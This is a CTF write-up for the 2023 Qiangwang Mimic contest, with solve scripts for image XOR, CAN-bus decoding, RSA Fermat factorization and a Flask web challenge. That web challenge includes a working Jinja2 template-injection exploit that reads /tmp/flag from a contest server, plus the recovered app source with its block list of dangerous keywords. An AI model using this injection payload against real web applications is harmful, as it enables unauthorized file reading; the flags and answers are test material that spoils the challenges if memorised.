强网拟态2023 部分wp

[强网拟态 2023] 国际象棋与二维码

搞一个49格子的国际象棋棋盘，与原图像异或，这里把原图扩大了49倍，49格的棋盘扩大了500倍，去异或。

from PIL import Image
import numpy as np

img1 = np.zeros((49,49,3), dtype=np.uint8)
for i in range(49):
    for j in range(49):
        pixel = ((i+j)%2) * 255
        img1[i,j,:] = [pixel,pixel,pixel]
img1 = np.repeat(img1, 500, axis=0)
img1 = np.repeat(img1, 500, axis=1)
# Image.fromarray(img).save("res1.png")

img2 = np.array(Image.open("attach.png").convert("RGB"))
img2 = np.repeat(img2,49,axis=0)
img2 = np.repeat(img2,49,axis=1)
# Image.fromarray(img2).save("res2.png")

# img1 = np.array(Image.open("res1.png").convert("RGB"))
# img2 = np.array(Image.open("res2.png").convert("RGB"))

img3 = img1 ^ img2
Image.fromarray(img3).save("res3.png")

[强网拟态 2023] 用户登记系统

exp.py

import requests
url = 'http://116.63.134.105/index.php'
for i in range(1000):

    paylaod = {'name':'{{c.__init__.__globals__.__builtins__.open("".join(c.__init__.__globals__["__builtins__"].reversed("galf/pmt/"))).read()['+str(i)+']}}'}
    response = requests.post(url,data=paylaod).text[8]
    print(response,end='')

'''
flag{u_win_have_fun}
'''

附上读出来的源码，&符号应该为引号

import random
from flask import Flask, request, render_template_string, abort, redirect
import string

white_list = string.ascii_letters + string.digits + &()_-{}.&[]=/&
#mimic-defense-31919-heterogeneous
#mimic-defense-29414-heterogeneous
black_list = [&codecs&, &system&, &for&, &if&,
              &end&, &os&, &eval&, &request&, &write&,
              &mro&, &compile&, &execfile&, &exec&,
              &subprocess&, &importlib&, &platform&, &timeit&,
              &import&, &linecache&, &module&, &getattribute&,
              &pop&, &getitem&, &decode&, &popen&,
              &ifconfig&, &flag&, &config&, &cat&]

app = Flask(__name__)
#mimic-defense-94180-heterogeneous


@app.after_request
def modify_headers(response):
    random_str = [&PHP/7.3.33&, &PHP/7.4&, &PHP/7.2&, &PHP/8.2&]
    response.headers[&X-Powered-By&] = random.choice(random_str)
    return response


def check(s):
#mimic-defense-86550-heterogeneous
    # print(len(s))
    # if len(s) & 131:
    if len(s) & 478:
        abort(500, &u are hacker&)
        # abort(500, &hacker len&)
    for i in s:
        if i not in white_list:
            abort(500, &u are hacker&)
            # abort(500, &hacker white&)
    for i in black_list:
        if i in s:
            abort(500, &u are hacker&)
            # abort(500, &hacker black&)
#mimic-defense-26568-heterogeneous


@app.route(&/&)
def redirectIndex():
    return redirect(&/index.php&, 302)


@app.route(&/index.php&, methods=[&GET&, &POST&])
def hello_world():
#mimic-defense-7691-heterogeneous
#mimic-defense-50975-heterogeneous
    template = &&&
            &h1&用户登记系统&/h1&
            &form method=&POST&&
                &label for=&name&&输入用户名称:&/label&
                &input type=&text& id=&name& name=&name&&
                &input type=&submit& value=&Submit&&
            &/form&

            {% if name %}
                &p&您好, {{ name }} 已登记!&/p&
            {% endif %}
        &&&
    if request.method == &POST&:
        try:
            print(request.form)
            name = request.form.get(&name&)
        except Exception:
            return render_template_string(&&h1&需要name参数&h1&&)

        if name == &&:
#mimic-defense-81766-heterogeneous
            return render_template_string(&&h1&请输入用户名!&h1&&)

        check(name)
        template = &&h1&您好, {}已登记!!&h1&&.format(name)
        res = render_template_string(template)
        if &flag& in res:
#mimic-defense-31218-heterogeneous
            abort(500, &u are hacker&)
#mimic-defense-55651-heterogeneous
        return res
    return render_template_string(template)


if __name__ == &__main__&:
    app.run(host=&0.0.0.0&, debug=True)

[强网拟态 2023] find me and crack me

上一届原题

https://www.cmd5.com/

https://www.mklab.cn/utils/des

1.maybe used first url get random:
/mimic_storage

2.maybe used second url get flag:
/getflag?sec=random&path=xxxx

xxx is:
MVhuOtClaoE5899iOuiSWkvqxsrRimmb

http://web-e5face3ce6.challenge.xctf.org.cn/getflag?sec=1851183404&path=MVhuOtClaoE5899iOuiSWkvqxsrRimmb

'''
flag{bWltaWMtQ3RmLVd1SmlhbmdYaW5n}
'''

[强网拟态 2023] Tbox can

import pandas as pd

df = pd.read_csv("./can_data.csv")

data_columns = df['data']
for i in data_columns:
    i = str(i)
    if i[:2] == '0x':
        print(chr(int(i,16)),end='')

'''
flag{L0QGIC_ANAR1YSIS_CSAN_FOR_TFUN}
'''

[强网拟态 2023] 一眼看出

https://blog.csdn.net/hacker_zrq/article/details/121444869 //费马分解

from Crypto.Util.number import *
from secret import flag
import gmpy2
flag=b''
r = getPrime(6)
a = 11001240791308496565411773845509754352597481464288272699325231395472137144610774645372812149675141360600469640492874223541765389441131365669731006263464699
p = gmpy2.next_prime(a - r)
q = gmpy2.next_prime(gmpy2.next_prime(a) + r)
n = p*q
def enc(flag, n):
    m = bytes_to_long(flag)
    return pow(m, 65537, n)
c = enc(flag, n)
print('n =', n)
print('c =', c)
# ('n =', mpz(121027298948349995679677982412648544403333177260975245569073983061538581058440163574922807151182889153495253964764966037308461724272151584478723275142858008261257709817963330011376266261119767294949088397671360123321149414700981035517299807126625758046100840667081332434968770862731073693976604061597575813313L))
# ('c =', mpz(42256117129723577554705402387775886393426604555611637074394963219097781224776058009003521565944180241032100329456702310737369381890041336312084091995865560402681403775751012856436207938771611177592600423563671217656908392901713661029126149486651409531213711103407037959788587839729511719756709763927616470267L))

import gmpy2
from Crypto.Util.number import *
n = 121027298948349995679677982412648544403333177260975245569073983061538581058440163574922807151182889153495253964764966037308461724272151584478723275142858008261257709817963330011376266261119767294949088397671360123321149414700981035517299807126625758046100840667081332434968770862731073693976604061597575813313
c = 42256117129723577554705402387775886393426604555611637074394963219097781224776058009003521565944180241032100329456702310737369381890041336312084091995865560402681403775751012856436207938771611177592600423563671217656908392901713661029126149486651409531213711103407037959788587839729511719756709763927616470267
a = gmpy2.iroot(n,2)[0]
while True:
    b1 = pow(a,2) - n
    print(a)
    if gmpy2.is_square(b1):
        b = gmpy2.iroot(b1,2)[0]
        q = a+b
        p = a-b
        break
    a = a + 1
fi = (p-1)*(q-1)
e = 65537
d = gmpy2.invert(e,fi)
m = pow(c,d,n)
m = long_to_bytes(m)
print(m)
'''
b'flag{621f7c4f-21de-8566-649e-5a883ce318dc}'
'''